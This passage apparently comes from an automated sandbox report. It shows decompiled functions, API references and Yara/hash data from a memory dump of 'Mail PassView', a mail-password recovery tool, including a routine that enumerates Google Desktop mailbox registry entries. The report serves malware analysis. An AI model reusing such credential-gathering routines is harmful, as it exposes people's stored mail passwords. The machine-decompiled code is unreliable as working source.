                                                  0x00408600
                                                  0x00408605
                                                  0x00408606
                                                  0x0040860b
                                                  0x0040860c
                                                  0x00408611
                                                  0x00408613
                                                  0x00408618
                                                  0x00408619
                                                  0x0040861e
                                                  0x0040861f
                                                  0x00408624
                                                  0x00408626
                                                  0x0040862b
                                                  0x0040862c
                                                  0x00408631
                                                  0x00408632
                                                  0x0040863c
                                                  0x00408640
                                                  0x00408646

                                                  APIs
                                                    • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040857E
                                                    • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040858C
                                                    • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040859D
                                                    • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085B4
                                                    • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085BD
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004085F3
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00408606
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00408619
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040862C
                                                  • free.MSVCRT(00000000), ref: 00408640
                                                    • Part of subcall function 00406B5B: free.MSVCRT(00000000,00406DE2,00000000,?,?), ref: 00406B62
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??3@$free
                                                  • String ID:
                                                  • API String ID: 2241099983-0
                                                  • Opcode ID: 0216321c22edde0e428b6460b65a4d9d3fdf50d22b04996e8803d6d71622e83e
                                                  • Instruction ID: 9ddd328a78e70669a2f2a4495a49ad6ad9a3331e0dda25fcf26d4743fc91c851
                                                  • Opcode Fuzzy Hash: 0216321c22edde0e428b6460b65a4d9d3fdf50d22b04996e8803d6d71622e83e
                                                  • Instruction Fuzzy Hash: E3F0F6729028306BC9213B275011A8EB3657D4171431B056FF946BB7A28F3C6E9246FD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040E81A, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 19%
                                                  			E0040E81A(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, intOrPtr _a12) {
				void* __esi;
				void* _t11;
				void* _t26;
				void* _t27;

				_t26 = __edx;
				_t11 = _a4 - 0x110;
				_t27 = __ecx;
				if(_t11 == 0) {
					E0040E4A4(__ecx, __ecx, __eflags);
					E00406491(_t26,  *((intOrPtr*)(__ecx + 4)));
					L5:
					return E004015AE(_t27, _a4, _a8, _a12);
				}
				if(_t11 != 0x28 || E004062D1(_a12) == 0) {
					goto L5;
				} else {
					SetBkMode(_a8, 1);
					SetBkColor(_a8, GetSysColor(5));
					SetTextColor(_a8, 0xc00000);
					return GetSysColorBrush(5);
				}
			}







                                                  0x0040e81a
                                                  0x0040e820
                                                  0x0040e826
                                                  0x0040e828
                                                  0x0040e871
                                                  0x0040e879
                                                  0x0040e87f
                                                  0x00000000
                                                  0x0040e88a
                                                  0x0040e82d
                                                  0x00000000
                                                  0x0040e83c
                                                  0x0040e841
                                                  0x0040e853
                                                  0x0040e861
                                                  0x00000000
                                                  0x0040e869

                                                  APIs
                                                    • Part of subcall function 004062D1: memset.MSVCRT ref: 004062F1
                                                    • Part of subcall function 004062D1: GetClassNameA.USER32(?,00000000,000000FF), ref: 00406304
                                                    • Part of subcall function 004062D1: _stricmp.MSVCRT(00000000,edit), ref: 00406316
                                                  • SetBkMode.GDI32(?,00000001), ref: 0040E841
                                                  • GetSysColor.USER32(00000005), ref: 0040E849
                                                  • SetBkColor.GDI32(?,00000000), ref: 0040E853
                                                  • SetTextColor.GDI32(?,00C00000), ref: 0040E861
                                                  • GetSysColorBrush.USER32(00000005), ref: 0040E869
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Color$BrushClassModeNameText_stricmpmemset
                                                  • String ID:
                                                  • API String ID: 1869857563-0
                                                  • Opcode ID: fa2efa1d352e815f872068aeb743c84bb0f55ba64056062ab12fb6989f15ddc0
                                                  • Instruction ID: 70d3a7b2db974a4d4567ef1bfe72cf66993607b5e30e9ab541cb73924f0fe55d
                                                  • Opcode Fuzzy Hash: fa2efa1d352e815f872068aeb743c84bb0f55ba64056062ab12fb6989f15ddc0
                                                  • Instruction Fuzzy Hash: 8CF01D32100205BBDF152FA6DD09E9E3F25EF08711F10C53AFA19A51E1CAB5D970DB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040B105, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 82%
                                                  			E0040B105(intOrPtr __ecx, short _a4, short _a8) {
				char _v265;
				char _v520;
				char _v532;
				RECT* _v540;
				char _v560;
				intOrPtr _v564;
				char _v568;
				intOrPtr _v572;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t54;
				void* _t77;
				short _t85;
				short _t86;
				RECT* _t97;
				intOrPtr _t104;

				_t93 = __ecx;
				_t97 = 0;
				_t104 = __ecx;
				_v564 = __ecx;
				if(_a4 == 0 || _a4 == 1) {
					_t85 = _a8;
					if(_t85 == 0x9c42) {
						_t54 = DestroyWindow( *(_t104 + 0x108));
					}
					_t114 = _t85 - 0x9c49;
					if(_t85 == 0x9c49) {
						_t54 = E0040AEAA(_t93, _t97, _t104, _t114);
					}
					_t115 = _t85 - 0x9c59;
					if(_t85 == 0x9c59) {
						_t54 = E0040AE70(_t97, _t104, _t115);
					}
					_t116 = _t85 - 0x9c56;
					if(_t85 == 0x9c56) {
						_t54 = E0040ADB3(_t104, _t116);
					}
					if(_a8 == 0x9c58) {
						 *( *((intOrPtr*)(_t104 + 0x36c)) + 0xc) =  *( *((intOrPtr*)(_t104 + 0x36c)) + 0xc) ^ 0x00000001;
						_t54 = E0040A27F(0, _t93, _t104, 0);
					}
					if(_a8 == 0x9c44) {
						_t54 = E0040AD9D(_t104);
					}
					if(_a8 == 0x9c43) {
						_v532 = 0x413560;
						E00401000(_t93,  &_v520, 0x412404);
						E00401000(_t93,  &_v265, 0x412440);
						_t104 = _v564;
						_push( *(_t104 + 0x108));
						_push( &_v532);
						_t77 = 0x70;
						E00401540(_t77);
						SetFocus( *( *((intOrPtr*)(_t104 + 0x370)) + 0x184));
						_t20 =  &_v540; // 0x413560
						_t54 = E0040143D(_t20);
						_t97 = 0;
					}
					_t86 = _a8;
					_t122 = _t86 - 0x9c41;
					if(_t86 == 0x9c41) {
						_t54 = E0040AD38(_t104, _t93, _t122);
					}
					if(_t86 != 0x9c47) {
						L23:
						__eflags = _t86 - 0x9c4f;
						if(_t86 != 0x9c4f) {
							L27:
							__eflags = _t86 - 0x9c48;
							if(_t86 == 0x9c48) {
								_t54 = E0040AC8A(_t104, _t86);
							}
							__eflags = _t86 - 0x9c45;
							if(__eflags == 0) {
								_t100 = _t104 + 0x36c;
								 *( *(_t104 + 0x36c) + 4) =  *( *(_t104 + 0x36c) + 4) ^ 0x00000001;
								E0040A27F(0, _t93, _t104, __eflags);
								_t93 = 1;
								_t54 = E0040A00B( *((intOrPtr*)(_t104 + 0x370)), 1,  *((intOrPtr*)( *_t100 + 4)));
								_t97 = 0;
								__eflags = 0;
							}
							__eflags = _a8 - 0x9c46;
							if(__eflags == 0) {
								_t54 = E0040B095(_t104, __eflags, _t97);
							}
							__eflags = _a8 - 0x9c5c;
							if(_a8 == 0x9c5c) {
								 *( *((intOrPtr*)(_t104 + 0x36c)) + 0x10) =  *( *((intOrPtr*)(_t104 + 0x36c)) + 0x10) ^ 0x00000001;
								__eflags = 0;
								E0040A27F(0, _t93, _t104, 0);
								E0040A437(_t104);
								_t54 = InvalidateRect( *( *((intOrPtr*)(_t104 + 0x370)) + 0x184), _t97, _t97);
							}
							__eflags = _a8 - 0x9c4a;
							if(__eflags == 0) {
								_t54 = E0040B095(_t104, __eflags, 1);
							}
							__eflags = _a8 - 0x9c4b;
							if(_a8 == 0x9c4b) {
								_v540 = _t97;
								_v560 = 0x412ff4;
								E00405960( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x370)) + 0x1b4)),  &_v560,  *(_t104 + 0x108),  *( *((intOrPtr*)(_t104 + 0x370)) + 0x184));
								_v568 = 0x412ff4;
								_t54 = E0040143D( &_v560);
								_t104 = _v572;
							}
							__eflags = _a8 - 0x9c4c;
							if(_a8 == 0x9c4c) {
								_t54 = E00408C3E( *((intOrPtr*)(_t104 + 0x370)));
							}
							__eflags = _a8 - 0x9c4e;
							if(_a8 == 0x9c4e) {
								_t54 = E00409C78( *((intOrPtr*)(_t104 + 0x370)),  *(_t104 + 0x108));
							}
							goto L43;
						}
						_t72 =  *((intOrPtr*)(_t104 + 0x370));
						__eflags =  *((intOrPtr*)(_t72 + 0x1b8)) - _t97;
						if( *((intOrPtr*)(_t72 + 0x1b8)) == _t97) {
							_t54 = E00408654(_t72, 0xffffffff, _t97, 2);
							goto L27;
						}
						_push(0xf000);
						_push(0x1000);
						goto L21;
					} else {
						_t72 =  *((intOrPtr*)(_t104 + 0x370));
						if( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x370)) + 0x1b8)) == _t97) {
							_t54 = E00408654(_t72, 0xffffffff, 2, 2);
							goto L23;
						}
						_push(0xf000);
						_push(0x2000);
						L21:
						_push(0xffffffff);
						_t54 = E00408654(_t72);
						goto L43;
					}
				} else {
					L43:
					return _t54;
				}
			}




















                                                  0x0040b105
                                                  0x0040b114
                                                  0x0040b11a
                                                  0x0040b11c
                                                  0x0040b120
                                                  0x0040b12d
                                                  0x0040b136
                                                  0x0040b13e
                                                  0x0040b13e
                                                  0x0040b144
                                                  0x0040b149
                                                  0x0040b14b
                                                  0x0040b14b
                                                  0x0040b150
                                                  0x0040b155
                                                  0x0040b157
                                                  0x0040b157
                                                  0x0040b15c
                                                  0x0040b161
                                                  0x0040b165
                                                  0x0040b165
                                                  0x0040b170
                                                  0x0040b178
                                                  0x0040b17e
                                                  0x0040b17e
                                                  0x0040b189
                                                  0x0040b18d
                                                  0x0040b18d
                                                  0x0040b198
                                                  0x0040b1a3
                                                  0x0040b1ab
                                                  0x0040b1bc
                                                  0x0040b1c1
                                                  0x0040b1c5
                                                  0x0040b1cf
                                                  0x0040b1d2
                                                  0x0040b1d3
                                                  0x0040b1e4
                                                  0x0040b1ea
                                                  0x0040b1ee
                                                  0x0040b1f3
                                                  0x0040b1f3
                                                  0x0040b1f5
                                                  0x0040b1f9
                                                  0x0040b1fe
                                                  0x0040b202
                                                  0x0040b202
                                                  0x0040b20c
                                                  0x0040b23d
                                                  0x0040b23d
                                                  0x0040b242
                                                  0x0040b268
                                                  0x0040b268
                                                  0x0040b26d
                                                  0x0040b271
                                                  0x0040b271
                                                  0x0040b276
                                                  0x0040b27b
                                                  0x0040b27d
                                                  0x0040b285
                                                  0x0040b28b
                                                  0x0040b29d
                                                  0x0040b29e
                                                  0x0040b2a3
                                                  0x0040b2a3
                                                  0x0040b2a3
                                                  0x0040b2a5
                                                  0x0040b2ab
                                                  0x0040b2b0
                                                  0x0040b2b0
                                                  0x0040b2b5
                                                  0x0040b2bb
                                                  0x0040b2c3
                                                  0x0040b2c7
                                                  0x0040b2c9
                                                  0x0040b2ce
                                                  0x0040b2e1
                                                  0x0040b2e1
                                                  0x0040b2e7
                                                  0x0040b2ed
                                                  0x0040b2f3
                                                  0x0040b2f3
                                                  0x0040b2f8
                                                  0x0040b2fe
                                                  0x0040b306
                                                  0x0040b30f
                                                  0x0040b329
                                                  0x0040b330
                                                  0x0040b334
                                                  0x0040b339
                                                  0x0040b339
                                                  0x0040b33d
                                                  0x0040b343
                                                  0x0040b34b
                                                  0x0040b34b
                                                  0x0040b350
                                                  0x0040b356
                                                  0x0040b364
                                                  0x0040b364
                                                  0x00000000
                                                  0x0040b356
                                                  0x0040b244
                                                  0x0040b24a
                                                  0x0040b250
                                                  0x0040b263
                                                  0x00000000
                                                  0x0040b263
                                                  0x0040b252
                                                  0x0040b257
                                                  0x00000000
                                                  0x0040b20e
                                                  0x0040b20e
                                                  0x0040b21a
                                                  0x0040b238
                                                  0x00000000
                                                  0x0040b238
                                                  0x0040b21c
                                                  0x0040b221
                                                  0x0040b226
                                                  0x0040b226
                                                  0x0040b228
                                                  0x00000000
                                                  0x0040b228
                                                  0x0040b369
                                                  0x0040b369
                                                  0x0040b36f
                                                  0x0040b36f

                                                  APIs
                                                  • DestroyWindow.USER32(?), ref: 0040B13E
                                                  • SetFocus.USER32(?,?,?), ref: 0040B1E4
                                                  • InvalidateRect.USER32(?,00000000,00000000), ref: 0040B2E1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DestroyFocusInvalidateRectWindow
                                                  • String ID: `5A
                                                  • API String ID: 3502187192-343712130
                                                  • Opcode ID: 4c3d990881eba3cf74bda8571d7f9b3248234962b7985cf1d53a89f59e718e54
                                                  • Instruction ID: 7dc3b259c8ef6dbe6f4b6ee630ad47b8a618685bd7b93527759b10f323b3e488
                                                  • Opcode Fuzzy Hash: 4c3d990881eba3cf74bda8571d7f9b3248234962b7985cf1d53a89f59e718e54
                                                  • Instruction Fuzzy Hash: 2B519130A043019BCB25BF658845E9AB3E0EF54724F44C57FF4696F2E1CB7999818B8E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405CEE, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 91%
                                                  			E00405CEE(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t29;
				struct HDWP__* _t30;
				RECT* _t58;
				intOrPtr _t66;

				_push(__ecx);
				_push(__ecx);
				_t66 = __ecx;
				_v12 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0x24) {
						if(_a4 == 0xf) {
							E0040173B(__ecx + 0xc);
						}
					} else {
						_t29 = _a12;
						 *((intOrPtr*)(_t29 + 0x18)) = 0x190;
						 *((intOrPtr*)(_t29 + 0x1c)) = 0xb4;
					}
				} else {
					_t30 = BeginDeferWindowPos(0xb);
					_t58 = _t66 + 0xc;
					_v8 = _t30;
					E0040169B(_t58, _t30, 0x3ed, 0, 0, 1);
					E0040169B(_t58, _v8, 0x3ee, 0, 0, 1);
					E0040169B(_t58, _v8, 0x3f4, 0, 0, 1);
					E0040169B(_t58, _v8, 0x3ef, 0, 0, 1);
					E0040169B(_t58, _v8, 0x3f0, 1, 0, 0);
					E0040169B(_t58, _v8, 0x3f1, 1, 0, 0);
					E0040169B(_t58, _v8, 0x3f5, 1, 0, 0);
					E0040169B(_t58, _v8, 0x3f2, 1, 0, 0);
					E0040169B(_t58, _v8, 0x3f3, 1, 1, 0);
					E0040169B(_t58, _v8, 1, 1, 1, 0);
					E0040169B(_t58, _v8, 2, 1, 1, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t58 + 0x10), _t58, 1);
					_t66 = _v12;
				}
				return E004015AE(_t66, _a4, _a8, _a12);
			}










                                                  0x00405cf1
                                                  0x00405cf2
                                                  0x00405cf9
                                                  0x00405cfb
                                                  0x00405cfe
                                                  0x00405df3
                                                  0x00405e0c
                                                  0x00405e11
                                                  0x00405e11
                                                  0x00405df5
                                                  0x00405df5
                                                  0x00405df8
                                                  0x00405dff
                                                  0x00405dff
                                                  0x00405d04
                                                  0x00405d07
                                                  0x00405d0f
                                                  0x00405d1d
                                                  0x00405d23
                                                  0x00405d35
                                                  0x00405d47
                                                  0x00405d59
                                                  0x00405d6b
                                                  0x00405d7d
                                                  0x00405d8f
                                                  0x00405da1
                                                  0x00405db3
                                                  0x00405dc1
                                                  0x00405dd0
                                                  0x00405dd8
                                                  0x00405de3
                                                  0x00405de9
                                                  0x00405dec
                                                  0x00405e29

                                                  APIs
                                                  • BeginDeferWindowPos.USER32 ref: 00405D07
                                                    • Part of subcall function 0040169B: GetDlgItem.USER32 ref: 004016AB
                                                    • Part of subcall function 0040169B: GetClientRect.USER32 ref: 004016BD
                                                    • Part of subcall function 0040169B: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401727
                                                  • EndDeferWindowPos.USER32(?), ref: 00405DD8
                                                  • InvalidateRect.USER32(?,?,00000001), ref: 00405DE3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                  • String ID: $
                                                  • API String ID: 2498372239-3993045852
                                                  • Opcode ID: eed8279c3271f2b27814900a34917ae49580b819969905b4e3b00ee4e388fd63
                                                  • Instruction ID: 46e20a5f719da2480e3b09a58904212cef45bdfb275aa5f1a4c21840a4711c1e
                                                  • Opcode Fuzzy Hash: eed8279c3271f2b27814900a34917ae49580b819969905b4e3b00ee4e388fd63
                                                  • Instruction Fuzzy Hash: EB316D30641254BBCB216F13DD49D9F3F7CEF86BA4F10483DB409762A1C6798E10DAA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040719C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040719C(void* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;
				char _v264;
				void* _v268;
				void* _v276;
				long _t17;
				void* _t21;
				void* _t24;
				void* _t29;
				int _t32;
				signed int _t36;
				void* _t39;
				void* _t40;
				void* _t41;

				_t29 = __ecx;
				_t17 = E0040EB3F(0x80000001, "Software\\Google\\Google Desktop\\Mailboxes",  &_v268);
				_t39 = (_t36 & 0xfffffff8) - 0x108 + 0xc;
				if(_t17 == 0) {
					_t32 = 0;
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_t40 = _t39 + 0xc;
					_t21 = E0040EC05(_v268, 0,  &_v260);
					while(1) {
						_t41 = _t40 + 0xc;
						if(_t21 != 0) {
							break;
						}
						_t24 = E0040EB3F(_v268,  &_v260,  &_v264);
						_t40 = _t41 + 0xc;
						if(_t24 == 0) {
							E0040706C(_t29, _a4, _v264,  &_v260);
							RegCloseKey(_v276);
						}
						_t32 = _t32 + 1;
						_t21 = E0040EC05(_v268, _t32,  &_v260);
					}
					_t17 = RegCloseKey(_v268);
				}
				return _t17;
			}

















                                                  0x0040719c
                                                  0x004071b9
                                                  0x004071be
                                                  0x004071c3
                                                  0x004071ca
                                                  0x004071d2
                                                  0x004071d7
                                                  0x004071dc
                                                  0x004071e9
                                                  0x00407237
                                                  0x00407237
                                                  0x0040723c
                                                  0x00000000
                                                  0x00000000
                                                  0x00407204
                                                  0x00407209
                                                  0x0040720e
                                                  0x0040721c
                                                  0x00407225
                                                  0x00407225
                                                  0x0040722c
                                                  0x00407232
                                                  0x00407232
                                                  0x00407242
                                                  0x00407242
                                                  0x00407249

                                                  APIs
                                                    • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                  • memset.MSVCRT ref: 004071D7
                                                    • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 00407225
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 00407242
                                                  Strings
                                                  • Software\Google\Google Desktop\Mailboxes, xrefs: 004071AF
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close$EnumOpenmemset
                                                  • String ID: Software\Google\Google Desktop\Mailboxes
                                                  • API String ID: 2255314230-2212045309
                                                  • Opcode ID: 452db49ed067e6e6e63c10348168c8f88923fb1a9b6aea3e0d2cfe22e4762b25
                                                  • Instruction ID: abca04dfe3767426288f52b4a512d9ce3e2bfadbcd13eaa8a3c626f28e0c8a54
                                                  • Opcode Fuzzy Hash: 452db49ed067e6e6e63c10348168c8f88923fb1a9b6aea3e0d2cfe22e4762b25
                                                  • Instruction Fuzzy Hash: A71142728083456BD710EE52DC01EAB7BECEB84344F04093EF995E1191E735E628DAA7
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040B70A, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38registryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040B70A(void* __esi) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t15;
				struct HWND__* _t20;

				_t15 =  *0x416b94; // 0x400000
				_v44.hInstance = _t15;
				_v44.hIcon =  *((intOrPtr*)(__esi + 0x104));
				_v44.lpszClassName = __esi + 4;
				_v44.style = 0;
				_v44.lpfnWndProc = E004017C1;
				_v44.cbClsExtra = 0;
				_v44.cbWndExtra = 0;
				_v44.hCursor = 0;
				_v44.hbrBackground = 0x10;
				_v44.lpszMenuName = 0;
				RegisterClassA( &_v44);
				_t20 = CreateWindowExA(0, "MailPassView", "Mail PassView", 0xcf0000, 0, 0, 0x280, 0x1e0, 0, 0,  *0x416b94, __esi);
				 *(__esi + 0x108) = _t20;
				return _t20;
			}






                                                  0x0040b710
                                                  0x0040b715
                                                  0x0040b71e
                                                  0x0040b727
                                                  0x0040b72e
                                                  0x0040b731
                                                  0x0040b738
                                                  0x0040b73b
                                                  0x0040b73e
                                                  0x0040b741
                                                  0x0040b748
                                                  0x0040b74b
                                                  0x0040b776
                                                  0x0040b77c
                                                  0x0040b784

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ClassCreateRegisterWindow
                                                  • String ID: Mail PassView$MailPassView
                                                  • API String ID: 3469048531-1277648965
                                                  • Opcode ID: 7d9b3190e156b9bfff027be3e0f607fb910863f17b47cbf685ca248547ef7640
                                                  • Instruction ID: f223c9819260e0b75888b36d0bfde8daf7ba5992c102a2aca34afaaeb944facf
                                                  • Opcode Fuzzy Hash: 7d9b3190e156b9bfff027be3e0f607fb910863f17b47cbf685ca248547ef7640
                                                  • Instruction Fuzzy Hash: 3601ECB5D01248ABDB10CF96CD45ADFFFF8EB99B00F10812AE555F2250D7B46544CB68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401085, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00401085(void* __esi, void* __eflags) {
				struct tagLOGFONTA _v64;
				int _t10;
				long _t11;

				E00406191( &_v64, "MS Sans Serif", 0xa, 1);
				_t10 = CreateFontIndirectA( &_v64);
				 *(__esi + 0x20c) = _t10;
				_t11 = SendDlgItemMessageA( *(__esi + 4), 0x3ec, 0x30, _t10, 0);
				if( *0x417388 != 0) {
					return SendDlgItemMessageA( *(__esi + 4), 0x3ee, 0x30,  *(__esi + 0x20c), 0);
				}
				return _t11;
			}






                                                  0x00401098
                                                  0x004010a4
                                                  0x004010bd
                                                  0x004010c3
                                                  0x004010cc
                                                  0x00000000
                                                  0x004010e0
                                                  0x004010e4

                                                  APIs
                                                    • Part of subcall function 00406191: memset.MSVCRT ref: 0040619B
                                                    • Part of subcall function 00406191: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406269,Arial,0000000E,00000000), ref: 004061DB
                                                  • CreateFontIndirectA.GDI32(?), ref: 004010A4
                                                  • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 004010C3
                                                  • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 004010E0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ItemMessageSend$CreateFontIndirectmemsetstrcpy
                                                  • String ID: MS Sans Serif
                                                  • API String ID: 4251605573-168460110
                                                  • Opcode ID: a5c1b06fa8ac567c51537cce04f23f48b3e0294f7b0701913d9bb68d384747bd
                                                  • Instruction ID: 11d026e54a5ae2454c64c325e08d9e616df03e05f7163fa19ba200447038793b
                                                  • Opcode Fuzzy Hash: a5c1b06fa8ac567c51537cce04f23f48b3e0294f7b0701913d9bb68d384747bd
                                                  • Instruction Fuzzy Hash: 73F0A775A8034877E72167A0ED47F8A7BACAB40B00F10C135FB61B51E1D6F47554DB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040DE43, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040DE43(void** __eax, struct HWND__* _a4) {
				int _t6;
				void** _t10;

				_t10 = __eax;
				if( *0x417510 == 0) {
					memcpy(0x416e70,  *__eax, 0x50);
					memcpy(0x416ba0,  *(_t10 + 4), 0x2cc);
					 *0x417510 = 1;
					_t6 = DialogBoxParamA( *0x416b94, 0x6b, _a4, E0040DB39, 0);
					 *0x417510 =  *0x417510 & 0x00000000;
					 *0x416b9c = _t6;
					return 1;
				} else {
					return 1;
				}
			}





                                                  0x0040de4b
                                                  0x0040de4d
                                                  0x0040de5d
                                                  0x0040de6f
                                                  0x0040de8d
                                                  0x0040de93
                                                  0x0040de99
                                                  0x0040dea0
                                                  0x0040dea8
                                                  0x0040de4f
                                                  0x0040de53
                                                  0x0040de53

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpy$DialogParam
                                                  • String ID: V7
                                                  • API String ID: 392721444-2959985473
                                                  • Opcode ID: 5e9eade56f70dddb9201fe9d43162507361263185449feca73d32e9d96fafbc6
                                                  • Instruction ID: 1a8743d5fef8bbef7923f2c95fec7d45d4f15d0a806a7122114c86eec2fd18b9
                                                  • Opcode Fuzzy Hash: 5e9eade56f70dddb9201fe9d43162507361263185449feca73d32e9d96fafbc6
                                                  • Instruction Fuzzy Hash: 93F0A7716843207BD7116F54AC06BC63BF2B704B5AF114926F149E40E1D3F56550CBCC
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004062D1, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 58%
                                                  			E004062D1(struct HWND__* _a4) {
				void _v259;
				char _v260;
				signed int _t10;

				_v260 = 0;
				memset( &_v259, 0, 0xff);
				GetClassNameA(_a4,  &_v260, 0xff);
				_t10 =  &_v260;
				_push("edit");
				_push(_t10);
				L004115B2();
				asm("sbb eax, eax");
				return  ~_t10 + 1;
			}






                                                  0x004062ea
                                                  0x004062f1
                                                  0x00406304
                                                  0x0040630a
                                                  0x00406310
                                                  0x00406315
                                                  0x00406316
                                                  0x0040631f
                                                  0x00406324

                                                  APIs
                                                  • memset.MSVCRT ref: 004062F1
                                                  • GetClassNameA.USER32(?,00000000,000000FF), ref: 00406304
                                                  • _stricmp.MSVCRT(00000000,edit), ref: 00406316
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ClassName_stricmpmemset
                                                  • String ID: edit
                                                  • API String ID: 3665161774-2167791130
                                                  • Opcode ID: f6364a9e82c342bcd76c39a965b38e05be617d7d52f0a224c2f99095176bc218
                                                  • Instruction ID: 6efc07277a00def775dca084f59963aaad452a70fda198cb5006c56c80a8bddd
                                                  • Opcode Fuzzy Hash: f6364a9e82c342bcd76c39a965b38e05be617d7d52f0a224c2f99095176bc218
                                                  • Instruction Fuzzy Hash: 75E09BB3C4412A7ADB21A764DC05FE53BAC9F59305F0001B6BD46E10D5E5B497C887A5
                                                  Uniqueness

